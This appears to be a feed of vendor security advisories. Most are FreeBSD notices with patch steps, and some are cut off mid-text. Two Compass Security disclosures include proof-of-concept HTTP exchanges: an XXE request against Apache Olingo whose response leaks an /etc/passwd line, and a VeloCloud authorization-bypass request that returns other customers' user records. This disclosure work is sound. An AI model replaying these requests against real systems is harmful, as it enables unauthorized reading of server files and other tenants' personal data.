FreeBSD Security Advisory FreeBSD-SA-20:02.ipsec
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-20:02.ipsec Security Advisory The FreeBSD Project Topic: Missing IPsec anti-replay window check Category: core Module: kernel Announced: 2020-01-28 Credits:Jean-Francois HREN Affects:FreeBSD 12.0 only Corrected: 2020-01-28 18:56:46 UTC (releng/12.0, 12.0-RELEASE-p13) CVE Name: CVE-2019-5613 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background IPsec is a suite of protocols providing data authentication, integrity, and confidentiality between two networked hosts. II. Problem Description A missing check means that an attacker can reinject an old packet and it will be accepted and processed by the IPsec endpoint. III. Impact The impact depends on the higher-level protocols in use over IPsec. For example, an attacker who can capture and inject packets could cause an action that was intentionally performed once to be repeated. IV. Workaround No workaround is available. Systems not using IPsec are not vulnerable. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10min "Rebooting for a security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-20:02/ipsec.patch # fetch https://security.FreeBSD.org/patches/SA-20:02/ipsec.patch.asc # gpg --verify ipsec.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - releng/12.0/ r357218 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5613> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-20:02.ipsec.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl4whdFfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cIWbQ/9EvRm9/pFezk65B8NR9BJFYzSbFv8GxtxNjcFJ0KpG48s7XxBg9BWNKMs b7dtGTRlPKGUh0CRfhkCzxx10JZ0Aeu+UNNWQrt7r34pku1bUTrOAqW9nxIBq8zr tihvShWxWmMb9roeGRQIDpDoRCDs/Ps5eZ9NkTIRIPnGvidm8FTr8eQIHxSQJ/dX 9bnQO1KP3Fz1+ywKA/poMdfXwdrUhiaPaC9AQ704lMiz881Itsi93Xw9HceKar0E dnbPbXMTQ+mkdVe3U2KLVDIMs119XL3Nuel2y7ACNjH3Bvjeerfjn6rZfiseV5FR muH0I+HKVdkdgWrFRPPthzUTmZYaStgbgOymsclwCpUJkS/ITgJWTpx6V+0E+4n6 bocwue5xP9EtCKDoEp3RSf17f47nbHgA0oeR+1CU9bh2lU6h2lAxRhxkPcWrgBiJ HWSJ96UyF3S9Kfj7sbKBE/0wPQYRO2fs2PSfjvjmydyYlg0gcZ25tK3sm5xyvxoG pVCwMn3gFDchEWnxJaSrGg/xoQCCWM+KdVXkaBSdCEsqs8+o6bTXPrq8ZyU451aO 7qxLPBlw5XNZ87jUEOhT3PwH49H9sAl++4IHUUUvs5pcIigdTNplgVpRt2DdFDzg ardLO/Cyr1qAAMClC3jXx0I7uTViROt3x7lg2+2V7bF5SnL8VjU= =tFox -END PGP SIGNATURE-
FreeBSD Security Advisory FreeBSD-SA-20:01.libfetch
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-20:01.libfetch Security Advisory The FreeBSD Project Topic: libfetch buffer overflow Category: core Module: libfetch Announced: 2020-01-28 Credits:Duncan Overbruck Affects:All supported versions of FreeBSD. Corrected: 2020-01-28 18:40:55 UTC (stable/12, 12.1-STABLE) 2020-01-28 18:55:25 UTC (releng/12.1, 12.1-RELEASE-p2) 2020-01-28 18:55:25 UTC (releng/12.0, 12.0-RELEASE-p13) 2020-01-28 18:42:06 UTC (stable/11, 11.3-STABLE) 2020-01-28 18:55:25 UTC (releng/11.3, 11.3-RELEASE-p6) CVE Name: CVE-2020-7450 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background libfetch(3) is a multi-protocol file transfer library included with FreeBSD and used by the fetch(1) command-line tool, pkg(8) package manager, and others. II. Problem Description A programming error allows an attacker who can specify a URL with a username and/or password components to overflow libfetch(3) buffers. III. Impact An attacker in control of the URL to be fetched (possibly via HTTP redirect) may cause a heap buffer overflow, resulting in program misbehavior or malicious code execution. IV. Workaround No workaround is available. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-20:01/libfetch.patch # fetch https://security.FreeBSD.org/patches/SA-20:01/libfetch.patch.asc # gpg --verify libfetch.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html>. Restart all daemons that use the library, or reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r357213 releng/12.1/ r357217 releng/12.0/ r357217 stable/11/r357214 releng/11.3/ r357217 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7450> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-20:01.libfetch.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl4whc5fFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cJw5BAAmi4Mk+an8qJB4GwfOSxWhn42GnN9/HikJwkiTNHQr7n51ANp4sHCgTYG PCo6UvCFqdIfhpBIrykI7ZwzAetCpldDdIMQFJoi5ChJ7aIcNDpiH06yLjYLgseS qSxJ+dXt6j7G2FMUWPBka8eTNBi64gT0MbyC7zFdISfJqfNy+p0WvdwYm3UsWkeR pEV+o6zL+PI3s6IsqQTQzYuyNYgoTLdvhjgNMymI+OMH8uCdBUrdItdSwSYPwVOp +8SUX47jMFNcIbBmuQ3KnPxu9fHx8JzfqpLDAkmp6hu6sXNTmIZ27mgItu4DRgWN nvd750H6fv9UCbRYOyvjeuEN8olOpZcoTAuQDtcC/z7BvKAwLC7oAYXZEiQ4pn/D MGMzlJU7fxiyIWDNJprzyrsgPAUhCC3ePyenTErB+GQKmf1fHTjLWJHN43W2tbqk kYzMwwLQa3KwOYzHPHbJt6F94b9dN30v8cgIVkvs5ivLr8eErIJAQ71PgxkgRQL1 /C301qeJvgBqLm+so0Ef6wi/D9HvCvyk6IqbQNEvOXD8RNtyqdhBO1jJ93zDVLLK ey5room7Hln/A3l5bXBzb6O3+q60U7lbxzokkAhNoe+pls6HQ50OeainXDU1dal4 HcBOCM1cnXNjXDdizqdMDvyR7ftXuBxOY
FreeBSD Security Advisory FreeBSD-SA-20:03.thrmisc
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-20:03.thrmiscSecurity Advisory The FreeBSD Project Topic: kernel stack data disclosure Category: core Module: kernel Announced: 2020-01-28 Credits:Ilja Van Sprundel Affects:All supported versions of FreeBSD. Corrected: 2019-11-15 16:40:10 UTC (stable/12, 12.1-STABLE) 2020-01-28 18:57:45 UTC (releng/12.1, 12.1-RELEASE-p2) 2020-01-28 18:57:45 UTC (releng/12.0, 12.0-RELEASE-p13) 2019-11-15 16:40:55 UTC (stable/11, 11.3-STABLE) 2020-01-28 18:57:45 UTC (releng/11.3, 11.3-RELEASE-p6) CVE Name: CVE-2019-15875 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The kernel can create a core dump file when a process crashes that contains process state, for debugging. II. Problem Description Due to incorrect initialization of a stack data structure, up to 20 bytes of kernel data stored previously stored on the stack will be exposed to a crashing user process. III. Impact Sensitive kernel data may be disclosed. IV. Workaround Core dumps may be disabled by setting the kern.coredump sysctl to 0. See sysctl(8) and sysctl.conf(5). V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10min "Rebooting for a security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-20:03/thrmisc.patch # fetch https://security.FreeBSD.org/patches/SA-20:03/thrmisc.patch.asc # gpg --verify thrmisc.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r354734 releng/12.1/ r357219 releng/12.0/ r357219 stable/11/r354735 releng/11.3/ r357219 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15875> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-20:03.thrmisc.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl4whdVfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cLOgg/7BAIhE6SQ06BkCKNBerK3jj1sY2gBc7aohLbzdhEpCIrrd+sMsh0tphII ftR5psPaZahzjP9Mrs/lA1fWVsco1jo4icevGiPTfbEVqBF1S8XINccwQr3AvYJR 33PGUrgzY2rU8MTj0YPJ2EG3ahghb96lKkK3USikoJA5SsXSZkFphp2OFXnUFWbG TXWOUBWXbHMBUprf/oXcvNo/ZjDcxvJzMqT2YIGwKOsT0Xtx5nD+6C390axRuVEd sA6z1RhA/EEx6JMNSUAoG5rnJSXDYQTB2kd9ilozXi07CboVZ38loXy8492FGrin uG3MfnI+PHrMtG+S5yHwzOGhB/20DNoWqLKZobTGr46r8rrdc553F5Cn7ivLEz9Y Sk+IGjZfB99jv+JxCr/+/4gn3niOyh0MolqG9r0rT13fLmeQX5XtYfyYPJHE1wuR +JZ9TQSaJ6TX/DcIsy60OWcfWAQOeoYsvTZO6hqpjHt66m2Ah1pdAyc8c0R8yaQG tFpRhgQvYpiPJviq7NvM5V2afSo16RWWy9A+xEYUrxp0H0inVNOgdqwhln7ZzI4u YoBis/eZkNAPxqFJyvJ89TQFmsWFPcpHjAGMoL+aCuIotuHHa/MPdT2pfyqHG9iL E9axI8zhyzNUC+osR2I6DT/R8rF5QHAY8xI8FffiS8jfN3BJVm4= =3mdJ -END PGP SIGNATURE-
CVE-2019-17554 - Apache Olingo OData 4.0 - XML External Entity Resolution (XXE)
# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # # # # Product: Apache Olingo OData 4.0 # Vendor: Apache Foundation # CSNC ID: CSNC-2009-025 # CVE ID: CVE-2019-17554 # Subject: XML External Entity Resolution (XXE) # Risk: High # Effect: Remotely exploitable # Author: Archibald Haddock (advisor...@compass-security.com) # Date: 08.11.2019 # # Introduction: - Apache Olingo is a Java library that implements the Open Data Protocol (OData). [1] XML data is parsed by insecurley configured software components, which can be abused for XML External Entity Attacks [2]. Affected: - Vulnerable: * Olingo OData 4.x.x to 4.6.x Not vulnerable: * Olingo OData 4.7.0 * The Olingo OData 2.0 implementation has XXE protection since 1.1.0-RC01 Technical Description - The XML content type entity deserializer is not configured to deny the resolution of external entities. Request with content type "application/xml", which trigger the deserialization of entities, can be used to trigger XXE attacks. Request == POST /odata-server-sample/cars.svc/Cars HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://localhost:8081/odata-server-sample/ Cookie: JSESSIONID=17C3158153CDC2CA1DBA0E77D4AFC3B0 Upgrade-Insecure-Requests: 1 content-type: application/xml Content-Length: 1101 ]> http://www.w3.org/2005/Atom; xmlns:m="http://docs.oasis-open.org/odata/ns/metadata; xmlns:d="http://docs.oasis-open.org/odata/ns/data; m:context="$metadata#Cars/$entity"> Cars(1) 2019-11-08T15:10:30Z http://docs.oasis-open.org/odata/ns/related/Manufacturer; type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer"> http://docs.oasis-open.org/odata/ns/scheme; term="#olingo.odata.sample.Car"> 1 F1 2012 189189.43 EUR Response HTTP/1.1 201 Created Server: Apache-Coyote/1.1 OData-Version: 4.0 Content-Type: application/xml Content-Length: 960 Date: Fri, 08 Nov 2019 14:22:35 GMT Connection: close http://www.w3.org/2005/Atom; xmlns:m="http://docs.oasis-open.org/odata/ns/metadata; xmlns:d="http://docs.oasis-open.org/odata/ns/data; m:context="$metadata#Cars">Cars(1)2019-11-08T15:22:35Zhttp://docs.oasis-open.org/odata/ns/related/Manufacturer; type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer">http://docs.oasis-open.org/odata/ns/scheme; term="#olingo.odata.sample.Car">1 myuser:x:1000:1000:,,,:/home/myuser:/bin/bash 2012189189.43EUR Workaround / Fix: - Configure the XML reader securely [3]. In org.apache.olingo.server.core.deserializer.xml.ODataXmlDeserializer.java on line 70 a javax.xml.stream.XMLInputFactory is instanciated: private static final XMLInputFactory FACTORY = XMLInputFactory.newFactory(); The XMLInputFactory should be configured, not to resolve external entities: FACTORY.setProperty(XMLInputFactory.SUPPORT_DTD, false); FACTORY.setProperty("javax.xml.stream.isSupportingExternalEntities", false); Timeline: - 2019-11-08: Discovery by Compass Security 2019-11-08: Initial vendor notification 2019-11-08: Initial vendor response 2019-12-04: Release of fixed Version / Patch [4] 2019-12-05: Coordinated public disclosure date [1] https://olingo.apache.org/ [2] https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing [3] https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html [4] https://mail-archives.apache.org/mod_mbox/olingo-user/201912.mbox/%3CCAGSZ4d7Ty%3DL-n_iAzT6vcQp65BY29XZDS5tMoM8MdDrb1moM7A%40mail.gmail.com%3E Source: https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2019-025_apache_xxe.txt
FreeBSD Security Advisory FreeBSD-SA-19:25.mcepsc
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:25.mcepsc Security Advisory The FreeBSD Project Topic: Machine Check Exception on Page Size Change Category: core Module: kernel Announced: 2019-11-12 Credits:Intel Affects:All supported versions of FreeBSD. Corrected: 2019-11-12 18:03:26 UTC (stable/12, 12.1-STABLE) 2019-11-12 18:13:04 UTC (releng/12.1, 12.1-RELEASE-p1) 2019-11-12 18:13:04 UTC (releng/12.0, 12.0-RELEASE-p12) 2019-11-12 18:04:28 UTC (stable/11, 11.3-STABLE) 2019-11-12 18:13:04 UTC (releng/11.3, 11.3-RELEASE-p5) CVE Name: CVE-2018-12207 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The Intel machine check architecture is a mechanism to detect and report hardware errors, such as system bus errors, ECC errors, parity errors, and others. This allows the processor to signal the detection of a machine check error to the operating system. II. Problem Description Intel discovered a previously published erratum on some Intel platforms can be exploited by malicious software to potentially cause a denial of service by triggering a machine check that will crash or hang the system. III. Impact Malicious guest operating systems may be able to crash the host. IV. Workaround No workaround is available. Systems not running untrusted guest virtual machines are not impacted. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10min "Rebooting for a security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 12.1] # fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.12.1.patch # fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.12.1.patch.asc # gpg --verify mcepsc.12.1.patch.asc [FreeBSD 12.0] # fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.12.0.patch # fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.12.0.patch.asc # gpg --verify mcepsc.12.0.patch.asc [FreeBSD 11.3] # fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.11.patch # fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.11.patch.asc # gpg --verify mcepsc.11.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r354650 releng/12.1/ r354653 releng/12.0/ r354653 stable/11/r354651 releng/11.3/ r354653 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://software.intel.com/security-software-guidance/software-guidance/machine-check-error-avoidance-page-size-change> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12207> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:25.mcepsc.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl3K+khfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ
FreeBSD Security Advisory FreeBSD-SA-19:26.mcu
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:26.mcuSecurity Advisory The FreeBSD Project Topic: Intel CPU Microcode Update Category: 3rd party Module: Intel CPU microcode Announced: 2019-11-12 Credits:Intel Affects:All supported versions of FreeBSD running on certain Intel CPUs. CVE Name: CVE-2019-11135, CVE-2019-11139, CVE-2018-12126, CVE-2018-12127, CVE-2018-12130, CVE-2018-11091, CVE-2017-5715 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background - From time to time Intel releases new CPU microcode to address functional issues and security vulnerabilities. Such a release is also known as a Micro Code Update (MCU), and is a component of a broader Intel Platform Update (IPU). FreeBSD distributes CPU microcode via the devcpu-data port and package. II. Problem Description Starting with version 1.26, the devcpu-data port/package includes updates and mitigations for the following technical and security advisories (depending on CPU model). Intel TSX Updates (TAA) CVE-2019-11135 Voltage Modulation VulnerabilityCVE-2019-11139 MD_CLEAR Operations CVE-2018-12126 CVE-2018-12127 CVE-2018-12130 CVE-2018-11091 TA Indirect Sharing CVE-2017-5715 EGETKEY CVE-2018-12126 CVE-2018-12127 CVE-2018-12130 CVE-2018-11091 JCC SKX102 Erratum Updated microcode includes mitigations for CPU issues, but may also cause a performance regression due to the JCC erratum mitigation. Please visit http://www.intel.com/benchmarks for further information. Please visit http://www.intel.com/security for detailed information on these advisories as well as a list of CPUs that are affected. III. Impact Operating a CPU without the latest microcode may result in erratic or unpredictable behavior, including system crashes and lock ups. Certain issues listed in this advisory may result in the leakage of privileged system information to unprivileged users. Please refer to the security advisories listed above for detailed information. IV. Workaround To determine if TSX is present in your system, run the following: 1. kldload cpuctl 2. cpucontrol -i 7 /dev/cpuctl0 If bits 4 (0x10) and 11 (0x800) are set in the second response word (EBX), TSX is present. In the absence of updated microcode, TAA can be mitigated by enabling the MDS mitigation: 3. sysctl hw.mds_disable=1 Systems must be running FreeBSD 11.3, FreeBSD 12.1, or later for this to work. *IMPORTANT* If your use case can tolerate leaving the CPU issues unmitigated and cannot tolerate a performance regression, ensure that the devcpu-data package is not installed or is locked at 1.25 or earlier. # pkg delete devcpu-data or # pkg lock devcpu-data Later versions of the LLVM and GCC compilers will include changes that partially relieve the peformance impact. V. Solution Install the latest Intel Microcode Update via the devcpu-data port/package, version 1.26 or later. Updated microcode adds the ability to disable TSX. With updated microcode the issue can still be mitigated by enabling the MDS mitigation as described in the workaround section, or by disabling TSX instead: 1. kldload cpuctl 2. cpucontrol -i 7 /dev/cpuctl0 If bit 29 (0x2000) is set in the fourth response word (EDX), then the 0x10a MSR is present. 3. cpucontrol -m 0x10a /dev/cpuctl0 If bit 8 (0x100) of the response word is set, your CPU is not vulnerable to TAA and no further action is required. If bit 7 (0x80) is cleared, then your CPU does not have updated microcode that facilitates TSX to be disabled. The only remedy available is to enable the MDS mitigation, as documented above. 4. cpucontrol -m 0x122=3 /dev/cpuctl0 Repeat step 4 for each numbered CPU that is present. A future kernel change to FreeBSD will provide automatic detection and mitigation for TAA. LLVM 9.0 will be updated in FreeBSD 13-current to address the JCC peformance impact. Updates to prior versions of LLVM are currently being evaluated. VI. Correction details There are currently no changes in FreeBSD to address this issue. VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11135> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11139> https://cve.
CVE-2019-5533 - VMware VeloCloud Authorization Bypass
# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # # # # Product: VeloCloud # Vendor: VMware # CVE ID: CVE-2019-5533 # CSNC ID: CSNC-2019-007 # Subject: Authorization Bypass # Risk: Moderate # Effect: Remotely exploitable # CVSS v3.1 Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N # Author: Silas Bärtsch # Date: 10.16.2019 # # Introduction: - VeloCloud [1], now part of VMware, is a SD-WAN market leader. VMware SD-WAN by VeloCloud is a key component of the Virtual Cloud Network and tightly integrated with NSX Data Center and NSX Cloud to enable customers extend consistent networking and security policies from the data center to the branch to the cloud. Compass Security [2] identified a vulnerability that allows a VeloCloud standard admin user to access user information of other VeloCloud customers. Affected: - Vulnerable: 3.3.0 and 3.2.2. Not vulnerable: 3.3.1 No other version was tested, but it is believed for the older versions to be vulnerable as well. Technical Description - The standard admin user uses the following HTTP request to retrieve user information. The request contains the id parameter twice. The server does not perform any authorization checks on this parameter. Changing it will return the user details of the corresponding user, even if the returned user details belong to other VeloCloud customers. ``` POST /portal/ HTTP/1.1 Host: vco109-usca1.velocloud.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://vco109-usca1.velocloud.net/ Content-Type: application/json x-vco-privileges-version: 1560945325637 X-Requested-With: XMLHttpRequest Content-Length: 90 Cookie: culture=en-US; velocloud.session=[CUT-BY-COMPASS] Connection: close {"jsonrpc":"2.0","method":"enterpriseUser/getEnterpriseUser","params":{"id":1},"id":1} ``` The following information is returned. ``` HTTP/1.1 200 OK Server: nginx Date: Wed, 19 Jun 2019 13:02:11 GMT Content-Type: application/json Content-Length: 569 Connection: close X-Powered-By: Express Set-Cookie: velocloud.message=; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMT x-vco-privileges-version: 1560945325637 Cache-Control: no-cache,no-store,must-revalidate Pragma: no-cache Expires: 0 Strict-Transport-Security: max-age=31536000; includeSubdomains; X-Frame-Options: SAMEORIGIN {"jsonrpc":"2.0","result": { "id":[CUT-BY-COMPASS], "created":"[CUT-BY-COMPASS]", "userType":"[CUT-BY-COMPASS]", "username":"[CUT-BY-COMPASS]", "domain":[CUT-BY-COMPASS], "password":"*", "firstName":[CUT-BY-COMPASS], "lastName":[CUT-BY-COMPASS], "officePhone":[CUT-BY-COMPASS], "mobilePhone":[CUT-BY-COMPASS], "email":"[CUT-BY-COMPASS]", "isNative":[CUT-BY-COMPASS], "isActive":[CUT-BY-COMPASS], "isLocked":[CUT-BY-COMPASS], "disableSecondFactor":[CUT-BY-COMPASS], "lastLogin":"[CUT-BY-COMPASS]", "modified":"[CUT-BY-COMPASS]", "passwordModified":"[CUT-BY-COMPASS]", "enterpriseId":[CUT-BY-COMPASS], "enterpriseProxyId":[CUT-BY-COMPASS], "roleId":[CUT-BY-COMPASS], "roleName":"[CUT-BY-COMPASS]", "networkId":[CUT-BY-COMPASS], "isSuper":[CUT-BY-COMPASS]}, "id":[CUT-BY-COMPASS] } ``` Workaround / Fix: - Upgrade to VeloCloud 3.3.1, where the authorization checks are performed correctly. Timeline: - 2019-10-16: Coordinated public disclosure date 2019-08-26: Assigned CVE-2019-5533 2019-08-21: Release of VeloCloud 3.3.1 which includes a fix for the vulnerability 2019-07-02: Initial vendor response 2019-07-01: Initial vendor notification 2019-06-27: Assigned CSNC-2019-007 2019-06-19: Discovery by Silas Bärtsch References: --- [1] https://www.velocloud.com [2] https://compass-security.com
FreeBSD Security Advisory FreeBSD-SA-19:23.midi [REVISED]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:23.midi Security Advisory The FreeBSD Project Topic: kernel memory disclosure from /dev/midistat Category: core Module: sound Announced: 2019-08-20 Credits:Peter Holm, Mark Johnston Affects:All supported versions of FreeBSD. Corrected: 2019-08-20 17:53:16 UTC (stable/12, 12.0-STABLE) 2019-08-20 17:50:33 UTC (releng/12.0, 12.0-RELEASE-p10) 2019-08-20 17:54:18 UTC (stable/11, 11.3-STABLE) 2019-08-20 17:50:33 UTC (releng/11.3, 11.3-RELEASE-p3) 2019-08-20 17:50:33 UTC (releng/11.2, 11.2-RELEASE-p14) CVE Name: CVE-2019-5612 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. 0. Revision history v1.0 2019-08-20 Initial release. v1.1 2019-08-21 Updated workaround. I. Background /dev/midistat is a device file which can be read to obtain a human-readable list of the available MIDI-capable devices in the system. II. Problem Description The kernel driver for /dev/midistat implements a handler for read(2). This handler is not thread-safe, and a multi-threaded program can exploit races in the handler to cause it to copy out kernel memory outside the boundaries of midistat's data buffer. III. Impact The races allow a program to read kernel memory within a 4GB window centered at midistat's data buffer. The buffer is allocated each time the device is opened, so an attacker is not limited to a static 4GB region of memory. On 32-bit platforms, an attempt to trigger the race may cause a page fault in kernel mode, leading to a panic. IV. Workaround Restrict permissions on /dev/midistat by adding an entry to /etc/devfs.conf and restarting the service: # echo "perm midistat 0600" >> /etc/devfs.conf # service devfs restart Custom kernels without "device sound" are not vulnerable. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot. 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10min "Rebooting for security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:23/midi.patch # fetch https://security.FreeBSD.org/patches/SA-19:23/midi.patch.asc # gpg --verify midi.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r351264 releng/12.0/ r351260 stable/11/r351265 releng/11.3/ r351260 